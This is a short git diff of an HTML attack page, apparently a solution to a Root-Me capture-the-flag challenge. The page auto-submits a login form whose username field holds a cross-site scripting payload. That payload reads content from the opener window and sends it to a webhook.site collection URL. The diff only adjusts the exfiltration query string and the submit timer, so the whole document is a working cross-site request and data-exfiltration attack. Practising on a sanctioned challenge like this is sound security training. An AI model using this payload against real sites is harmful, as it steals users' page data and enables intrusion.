--- a/windowed/second_shared_context.html
+++ b/windowed/second_shared_context.html
@@ -8,7 +8,7 @@
 <h1>Page 2</h1>
 <form method="POST" action="http://challenge01.root-me.org:58003/login">
     <input type="text" name="username" value="<script> new Image().src='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?testencoding=1';
-    var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult/?g6g=' + encodeURIComponent(window.opener.document.querySelectorAll('section > p')[2].innerHTML), true);xhr.send();</script>">
+    var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURIComponent(window.opener.document.querySelectorAll('section > p')[2].innerHTML), true);xhr.send();</script>">
     <input type="text" name="secret" value="FAILED">
     <input type="submit">
 </form>
@@ -24,7 +24,9 @@
     //         mode: "no-cors"
     //     })
     // }
-    setTimeout(() => document.querySelector("form").submit(), 3000);
+
+
+    setTimeout(() =>{ document.querySelector("form").submit();}, 3000);
 
 
 
